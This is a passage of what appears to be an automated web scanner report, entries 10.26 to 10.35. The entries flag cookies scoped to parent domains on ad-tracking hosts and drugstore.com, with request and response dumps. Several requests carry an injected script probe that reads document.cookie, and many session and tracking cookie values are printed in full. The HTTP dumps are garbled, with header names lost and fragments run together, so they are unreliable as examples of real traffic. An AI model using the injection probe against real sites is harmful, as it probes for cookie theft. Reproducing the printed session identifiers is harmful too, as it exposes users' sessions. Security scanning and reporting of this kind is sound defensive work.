Host:
http://p.brilig.com
Path:
/contact/bct
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Sun, 08-Sep-2041 16:32:46 GMT
Request
GET /contact/bct?pid=db87fbb1-7ab7-43ef-8be9-04bf8c66111d&_ct=pixel&REDIR=http://a.collective-media.net/datapair?net=vt HTTP/1.1/*;q=0.5;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1-c194-43c5-a151-713a1d7fc584
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Sun, 08-Sep-2041 16:32:46 GMT .net/datapair?net=vt
10.26. http://pixel.quantserve.com/seg/r
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.quantserve.com
Path:
/seg/r
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:d=EHoBGgHcB7vR0r2IHh2EsRA; expires=Thu, 15-Dec-2011 16:30:38 GMT; path=/; domain=.quantserve.com
Request
GET /seg/r;a=p-86ZJnSph3DaTI;rand=025670655;redirect=http://a.collective-media.net/datapair?net=qc&id=121773f9380f32f&segs=!qcsegs&op=add HTTP/1.1/*;q=0.5;q=0.7-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA
Response
HTTP/1.1 302 Found.net/datapair?net=qc&id=121773f9380f32f&segs=D&op=addSet-Cookie: d=EHoBGgHcB7vR0r2IHh2EsRA; expires=Thu, 15-Dec-2011 16:30:38 GMT; path=/; domain=.quantserve.com
10.27. http://pixel.rubiconproject.com/tap.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.rubiconproject.com
Path:
/tap.php
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.rubiconproject.com
Request
GET /tap.php?v=6432&rnd1316186960 HTTP/1.1/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203;q=0.3ziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; put_2132=439524AE8C6B634E021F5F7802166020; ruid=154e62c97432177b6a4bcd01^6^1315959802^840399722; csi15=3165738.js^1^1315959802^1315959802; csi2=3167262.js^1^1315960045^1315960045; put_1185=2944787775510337379; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C191%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C
Response
HTTP/1.1 200 OKSet-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.rubiconproject.com %2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C219%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.pixel.rubiconproject.com!.......,...........T..;
10.28. http://rover.ebay.com/ar/1/711-53200-19255-108/1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rover.ebay.com
Path:
/ar/1/711-53200-19255-108/1
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:npii=btrm/svid%3D646543881975054aa8f^cguid/62d7951f1320a479e7268c86ff361dd15054aa8f^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:19:27 GMT; Path=/
Request
GET /ar/1/711-53200-19255-108/1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc= HTTP/1.1;q=0.354388197505092ad^cguid/62d7951f1320a479e7268c86ff361dd1505092ad^
Response
HTTP/1.1 200 OK*ts67.%6052f505-1327309143dSet-Cookie: npii=btrm/svid%3D646543881975054aa8f^cguid/62d7951f1320a479e7268c86ff361dd15054aa8f^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:19:27 GMT; Path=/ .com/rover/1/711-53200-19255-108/1?mpt=206427233991&toolid=7115320019255108&customid=&campid=5336830850&rvr_id=265440014577&imp_rvr_id=2654400...[SNIP]...
10.29. http://s.amazon-cornerstone.com/iui3
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://s.amazon-cornerstone.com
Path:
/iui3
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ad-id=Ayy0HVI91kopvWsXdVMP4Ng; Domain=amazon-cornerstone.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Request
GET /iui3?d=assoc-amazon.com&enId=Associates&eId=view&r=1&rP=http%3A%2F%2Fportal.opera.com%2F&cB=2790792565792799 HTTP/1.1;q=0.3sXdVMP4Ng
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "Set-Cookie: ad-id=Ayy0HVI91kopvWsXdVMP4Ng; Domain=amazon-cornerstone.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/ -Agent..,...........D..;
10.30. http://srv.healthheadlines.com/s.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://srv.healthheadlines.com
Path:
/s.php
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:_int_lst=QUl2Sm5BQUFBRE1BQUFBSkFBQUFVZ0FBQUdRQUFBQUZBQUFBQndBQUFBVUFBQUcxQUFBQXx5QUFBQUNJQUFBR1VBQUFBS1FBQUFaUUFBQUVzQUFBQUZBQUFCSkFBQUFBYUFBQUF1UT09fHx8MXwxMzE2MTkwMDI3; path=/; domain=.healthheadlines.com; httponly
Request
GET /s.php?c=51&d=9&t=0.08053325628861785&n=1133000173&k=http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ%26num%3D1%26sig%3DAOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw%26client%3Dca-pub-3796773913386149%26adurl%3D HTTP/1.1/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: _int_lst=QUl2Sm5BQUFBRE1BQUFBSkFBQUFVZ0FBQUdRQUFBQUZBQUFBQndBQUFBVUFBQUcxQUFBQXx5QUFBQUNJQUFBR1VBQUFBS1FBQUFaUUFBQUVzQUFBQUZBQUFCSkFBQUFBYUFBQUF1UT09fHx8MXwxMzE2MTkwMDI3; path=/; domain=.healthheadlines.com; httponly /xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type...[SNIP]...
10.31. http://t.tellapart.com/hif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/hif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:tap=u55Faqj9eQjR2O84CPogQjfO0UMPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1qmAAsAAQAAAAI3NQoAAwAAATJzE1qmAAsAAQAAAAI3NAoAAwAAATJzE1qmAAsAAQAAAAMxMDUKAAMAAAEycxNapgAA; expires=Wed, 14-Mar-2012 16:30:40 GMT; Path=/; Domain=.tellapart.com
Request
GET /hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC
Response
HTTP/1.1 200 OKSet-Cookie: tap=u55Faqj9eQjR2O84CPogQjfO0UMPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1qmAAsAAQAAAAI3NQoAAwAAATJzE1qmAAsAAQAAAAI3NAoAAwAAATJzE1qmAAsAAQAAAAMxMDUKAAMAAAEycxNapgAA; expires=Wed, 14-Mar-2012 16:30:40 GMT; Path=/; Domain=.tellapart.com ...[SNIP]...
10.32. http://t.tellapart.com/tpv
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/tpv
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:drapt=ABJeb1-OGLj4WPvpme0zBTQDHBR2ngUamtMs7GbygO59z7fXQOniCJ8DjeWZ8L9eYgAVK6hYK3p1tBNfX8Xmcx3xwQX_qgZHgGWzmqbFyg087KXDAfGZRSaIgDTBgVyOONjrkaJcuqQa2DYxgK6XBTR7LuHVTeCMVLKe36NAUdE36Dcb_E2NYoghvsg5T0ETAeX2LzcZMKlmy8WGiBSObQtOkAFDoGA3Tw; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com tap=f5bZJDN6To6TOJUrsLRvCLAoTUsPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1YSAAsAAQAAAAI3NQoAAwAAATJzE1YSAAsAAQAAAAI3NAoAAwAAATJzE1YSAAsAAQAAAAMxMDUKAAMAAAEycxNWEgAA; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com
Request
GET /tpv?aid=gMIVXPOjHwOK&xt=pv&xa=%7B%22PageType%22%3A%22Other%22%7D&ui=AE3CDAF6684448E8B02A74CB8F113324&r=1597292207&dmk=home&dmd=Shop%20for%20prescription%20drugs%2C%20health%20%26%20beauty%2C%20green%20%26%20natural%2C%20pet%20products%2C%20food%20%26%20gourmet%2C%20toys%20%26%20games%20and%20more%20at%20drugstore.com.&c=__cmbDomTm%3D0%3B__cmbU%3DABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg%3B__cmbTpvTm%3D1058&dt=drugstore.com%20Online%20Pharmacy%20-%20Prescription%20Drugs%2C%20Health%20and%20Beauty%2C%20plus%20more&dr=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&du=http%3A%2F%2Fwww.drugstore.com%2F%3Fec1bb%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E204f91ee9a2%3D1&v=4&sr=1920x1200&sc=16&bl=en-US HTTP/1.1;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC; tap=f5bZJDN6To6TOJUrsLRvCLAoTUsPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1YSAAsAAQAAAAI3NQoAAwAAATJzE1YSAAsAAQAAAAI3NAoAAwAAATJzE1YSAAsAAQAAAAMxMDUKAAMAAAEycxNWEgAA; __cmbPI=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==; __cmbPD=99/74/75/105; __cmbTmf=2320
Response
HTTP/1.1 200 OKSet-Cookie: drapt=ABJeb1-OGLj4WPvpme0zBTQDHBR2ngUamtMs7GbygO59z7fXQOniCJ8DjeWZ8L9eYgAVK6hYK3p1tBNfX8Xmcx3xwQX_qgZHgGWzmqbFyg087KXDAfGZRSaIgDTBgVyOONjrkaJcuqQa2DYxgK6XBTR7LuHVTeCMVLKe36NAUdE36Dcb_E2NYoghvsg5T0ETAeX2LzcZMKlmy8WGiBSObQtOkAFDoGA3Tw; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com Set-Cookie: tap=f5bZJDN6To6TOJUrsLRvCLAoTUsPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1YSAAsAAQAAAAI3NQoAAwAAATJzE1YSAAsAAQAAAAI3NAoAAwAAATJzE1YSAAsAAQAAAAMxMDUKAAMAAAEycxNWEgAA; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com _requestCallback({});
10.33. http://tags.bluekai.com/site/2731
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tags.bluekai.com
Path:
/site/2731
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:bklc=4e7379ae; expires=Sun, 18-Sep-2011 16:30:38 GMT; path=/; domain=.bluekai.com bk=eE0PtpKoj45Mq/0A; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com bkc=KJh5NWN/PaWDOdedKd1C1IwAOhVosVVZYHVVO/Uibv/w9N2asJvZY8kJ/k5YWHHJJSn69xV80vV6YjxxMu9uePGZrYiZL9yZulJHiX3WgcwKpclKzh5FCCIzzII8cIKsyLescZeAzg5M9xiHMI8qz0/wZYI6TEdj85QjFpzXRdijTjyXbDIqo/40oPF2XJyE9HjI9EIzngzK2gW3SR8UpQGOWtN9yb1nMQXpB7FDXBjvbVneB4lu7HKkph7KPux5v8eZI7EfLmjGBgYSSIcb8Abl4FqFGeE7vbIL9XTZn5pS7dezqniJpk9l80rU6P5faHMx4eGLlVuRX8De5ebERH+dsrvKaNvVzaV8Bmzg4XQa5GjLlvt/rI4ng31pN1lh0QwAfiDnQbL5ECYFUJXl7wyZ4E2QYh4Tow6osU2ACpEwglrmh+d2gTwmbbUgp8784nez47AbZ/8UdEBNxdoyMpEdv6dEptQC6nCT7BRfFoz2RoMgDU81IVBMyvWgnKuVOnrbP8gMkVdulifEKi5vs2l8taI0oOlb5cmIXZ+4rC2rAIt1nfPJFp6QwVrTFPvSI6Dl2T+r7kXl2TF05ffqPcX0mN64tdzEyizi6M0KXgD9fDzpNS08lud53gAdCIfELGDlZFL1ONwuJRSlsKqhkEduTG/cQEwQ2SNlfE41XzG55wIZPiy1/jlwlob911zga2wfWut01w0yyUwW11zgqT7uK6n2Xv/tHFzfrRs2H/I9qG8Uf3U8X3ZdEMto5dwjAfEdrMkKIEZ5ClXSsYIFX2hU/Llh0+wAq/3FMLDXN6SAmP88AKRqoFKkJafMKR2CMk4IuIr4UfUy+VpBzlKAYXrkj6rkbbAd5wwT0QX08l4FURPehcdNKsP9; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmp5jUa4A9oOCSsp93LAQ9ge9F6; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com
Request
GET /site/2731 HTTP/1.1/*;q=0.5;q=0.7KdBZhOZ7Duk/puQpJbcYAvOxcaNDEmYgYWwv5YWpuKx33WNHPYJvcNYxiNhvZ09J6xQi6SOkQG+iYLF9n1kanuGEZMg7p5p7wU4hjFMOd2pFK21kyc08eK5RgtLeuJw4s8Thd1hygWEb66qoTPnoeQKIRhaQXH4yyINNgqywN6+pUgZQWJMGOJ/wpfAOpBMLDzBqb3xgeEzmuw5zAe8MKsKa5vJ1ZLK7mT9NHTr9qnsaS8+bFwsp4TKArP885HNymZwC8+b6flqeqVW/zfN0eUNBkTaOpu4Y6ZtsrPT8uwLpsqqhJ870FqCQY54coqkKID1hLvwxholSknKdfsqSx2tzPhTA7NIt1JE+5ABT84ZLTzylbU+OVfQL/m6L0w0Cf5nzFIT8S7dUFtfSg8KKwI4fYXOY/SlP6baz7r4c7gGr44Y3BwXgE2wwSe7xr7uW8MrICdlR1/2cIHcPMT6OO0b5XrgjeUlu7aKIxVrfxFm53sfNdSP9t3PwB2zgFyfAfL1+LollhDfo+drAjyNlND7p45cB26Dl2bIqfTF05pfqBw81DV8Xf1OwYOIBucBf0kKY+Of+BsqBUR86CISOsJt7ax+FBwzqeiN/Ph7KSoMqPd8/AyF+O6bY8f4KLtmRXXg55wbZPi61/N4wloSs1mKPvI72iajRscZx2O6hpc7kpPabEIQIFsCv6w7mqs9F60mQZdwv45H4v5tFT62SFcgtJvtdqLTgwb42zvSOXUipfdT3SzTgE8mnvBIxuwCriACpU7ZJICrC2bD3NKCf+tcmvdIkIz27nU0+V4wzqK70rwHL+Uxnlxd5lnf0d4pIlUNUbhnhc8VkU4/=; bko=KJ0fnzg9Rnx0hTIHxRbwQKsMUbT4W61EOT0NAjmOyU1jucSc1/EaheYJeunnhEYHs0nspw9V3wK7j0ox7EWdMcD1ScvdJGCN9tiKS666AcVSiTsCPXDUjOLdMcVVsXqbJxJC1EczTRVJJxJjNlC9RgJ9mNbGtxO+ATu0sOA9pMT359==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0PPWNgD6WDwS2M4JZ7S5BShWdLxoFsFJ/GUPEXSOGCY0tRk+qZPVAgdx6iQ39NYlc7ECKbzKaYWeKibWJxxxxCieIQSL6Erl1C5oUiFVIZpGxAoqfapee74ohp828lbHY9KO64SW+M1x1TzvVdaNi/AnD/0SYiA468TBW9UKtoR0Qm2s9o0TM6U+yaNQTpWr/pqHfZiyjj0iMWGb6q2TXRomReCUu/4WnxljIMQWOP1/m3Z1FhKZDVznwswTUH/K1dueRasKvEYlEitcCg4tPP+b0tSeVrf/FVo8haw3KN58CLXxrpeg9e3Km+/bScrVHCjBVn0tzDGI/BT1kJxiiUEXCOnJX0BUNn8bnVsLmpWDS3RZxl6147IYgTzp94XOggdkapzYrFbkBbhlzdX6j8/fnuaZs4smDHQ1fVgvR8NrRXbkSm2CP++alj6wj273r7Iibnhvi3ckFkY+hV/4GfQYxK7MPbAlEs+FDKWOq0MHawHHFWvyF8m3Rbioam4Oyp0nNp3k4Td4GhP0JZIFNLpQl5S4adGn68gGIaW7Kw2OyVaUVc2B8DQmkh73Txj5nuCK0W0U82Dicz/yJU92DM7srHAWJzPqWnNTndTlDpXQfhtIWJdeTaqBVXN9FqfvgihsNGwCUngyKN35qEDBczMaUfal8Xlii1RU7Svnpe8IlgDdYkqvSQVaqhA0kZFILiABeLUuZikEPLFC3tVkK0t+5k60AIULbRapAxzmfPuaLum0IxlfdvqExCpHV5eBE4kiw+ytZvNvcjv3rdHsf67y==; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1pptD84A9oOCSsp9G10R2IrUT9/66nhy==; bkst=KJhBDn+vha9Dw1VYTvfrQoqSqKZal1K8ebNYrWPyWN5AWKp1iyPBRrWi+ZvfUbYkV+Cg8EK/kKJ4bO2TW8+1BzhyjoMEQf5PQOPRPs5P4PVaEI5hepbb6rzQz+vwApS9v03akYiGkkGMHpE4gElLQXBFUeoIbdQRH1bBW1GMwvKvSsDv/Mmkiv9mZ/AWEfwUzUwftmI6nP+oq5Y61zR2uuPeHsADHSlDp5qzt5FmlQHY6PeBw/b1Y3b6jfHTr9r5dfpKuUhoW2Ic9eLxIwq/fA2mJADTi6+iMb4UkloKa7PA5T+o4c9RnmGnsdZI7xP4fqY2Du434NXbS+38EsViKDRj3LH2C4/XFRzGdQ1J2Psc; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: bklc=4e7379ae; expires=Sun, 18-Sep-2011 16:30:38 GMT; path=/; domain=.bluekai.com Set-Cookie: bk=eE0PtpKoj45Mq/0A; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NWN/PaWDOdedKd1C1IwAOhVosVVZYHVVO/Uibv/w9N2asJvZY8kJ/k5YWHHJJSn69xV80vV6YjxxMu9uePGZrYiZL9yZulJHiX3WgcwKpclKzh5FCCIzzII8cIKsyLescZeAzg5M9xiHMI8qz0/wZYI6TEdj85QjFpzXRdijTjyXbDIqo/40oPF2XJyE9HjI9EIzngzK2gW3SR8UpQGOWtN9yb1nMQXpB7FDXBjvbVneB4lu7HKkph7KPux5v8eZI7EfLmjGBgYSSIcb8Abl4FqFGeE7vbIL9XTZn5pS7dezqniJpk9l80rU6P5faHMx4eGLlVuRX8De5ebERH+dsrvKaNvVzaV8Bmzg4XQa5GjLlvt/rI4ng31pN1lh0QwAfiDnQbL5ECYFUJXl7wyZ4E2QYh4Tow6osU2ACpEwglrmh+d2gTwmbbUgp8784nez47AbZ/8UdEBNxdoyMpEdv6dEptQC6nCT7BRfFoz2RoMgDU81IVBMyvWgnKuVOnrbP8gMkVdulifEKi5vs2l8taI0oOlb5cmIXZ+4rC2rAIt1nfPJFp6QwVrTFPvSI6Dl2T+r7kXl2TF05ffqPcX0mN64tdzEyizi6M0KXgD9fDzpNS08lud53gAdCIfELGDlZFL1ONwuJRSlsKqhkEduTG/cQEwQ2SNlfE41XzG55wIZPiy1/jlwlob911zga2wfWut01w0yyUwW11zgqT7uK6n2Xv/tHFzfrRs2H/I9qG8Uf3U8X3ZdEMto5dwjAfEdrMkKIEZ5ClXSsYIFX2hU/Llh0+wAq/3FMLDXN6SAmP88AKRqoFKkJafMKR2CMk4IuIr4UfUy+VpBzlKAYXrkj6rkbbAd5wwT0QX08l4FURPehcdNKsP9; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com Set-Cookie: bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmp5jUa4A9oOCSsp93LAQ9ge9F6; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com .bluekai.com/w3c/p3p.xml".NETSCAPE2.0.....!.. ....,...........L..;
10.34. http://www.drugstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:ndla3vftgeechv555qu43rz2; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:e5fygw55j4x2lwjzim2cqdi4
Response
HTTP/1.1 200 OKSet-Cookie: STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:ndla3vftgeechv555qu43rz2; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ =2316609728.0.0000; expires=Fri, 16-Sep-2011 17:30:25 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
10.35. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/pharmacy/drugindex/rxsearch.asp
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:yonvhm55shpcsh45w02oevnl; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
Request
GET /pharmacy/drugindex/rxsearch.asp?search=ess HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:ssmstg55acliez55gebilj55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; 